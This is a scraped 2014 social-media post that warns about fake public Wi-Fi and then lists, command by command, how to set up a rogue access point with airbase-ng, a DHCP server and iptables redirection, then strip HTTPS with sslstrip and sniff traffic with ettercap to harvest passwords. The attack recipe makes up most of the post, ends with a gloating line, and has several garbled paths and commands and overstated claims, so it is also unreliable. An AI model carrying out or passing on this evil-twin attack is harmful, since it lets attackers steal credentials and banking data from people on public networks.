Hey fb , You want to see how easy it is for a hacker to make a - TopicsExpress



          

Hey fb , You want to see how easy it is for a hacker to make a fake network around a public place for you to connect to? When you connect to a fake network users have no idea they should have just went ahead and gave all there sensitive information out because, When connected to a fake network you have given every bit of your information out. I always help inform as you should never connect to a public wifi if you run Windows on your computer. With the below commands you will be getting the same wifi at your hotel,park, etc and everything running smooth but, You are in a middle man attack and letting the hacker pull all your passwords,inboxs,emails,fav. sites, banking information, anything that has been on your Windows computer . Heres how they do it. When I put custom setups on computers I stop the hacker from being able to do the below: route -n copy under gateway ip ifconfig eth0 apt-get install dhcp3-server gedit /etc/dhcpd.config In the tex editor enter: authoritative: default-lease-time 600; subnet (Your Sub) netmask 255.255.255.0 { option routers 192.168.1.1; option subnet-mask 255.2.55.255.0; (etc) option domain-name FreeCharterWiFi5G option domain-name-servers 192.168.1.1; range 192.168.1.2 192.168.1.20; } I dont recommend doing more than 20 or so because you will jam up with too much traffic Terminal airmon-ng airmon-ng start wlan0 kill process airbase-ng -c 11 -e FreeCharterWiFi5G mon0 I like to name my fake network something that looks real as possible so users will connect Terminal#2 This will add more abilty to generate more traffic that airbase created ifocnfig at0 (Yoursubnet) netmask 255.255.255.0 ifconfig at0 mtu 1400 route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1 echo 1 > /peox/aya/nwt/ipc4/ip_foward iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.0.1 iptables -P FOWARD ACCEPT iptables --append FOWARD --in-interface at0 -j ACCEPT iptables --table nat --append POSTROUTING --out-inteface eth0 -j MASQUERADE iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0 Terminal to start the dhcpd server /etc/init/disc-dhcp-server start Terminal start sslstrip -f -p -k 10000 3rd Terminal ettercap -p -u -T-i at0 This will start the sniffing Terminal#4 cat sslstrip.log JDEVIL THEY WILL NEVER KNOW WHAT HIT EM Now they have a copy of your whole computer and not to mention good info about your other computers and etc. Also I have never done any of this without the owners permission as I get hired to find vulnerabilitys and exploit them and then build whats called patches to fix all of this. On a Windows computer.
Posted on: Wed, 01 Oct 2014 00:33:27 +0000

Trending Topics



Recently Viewed Topics




© 2015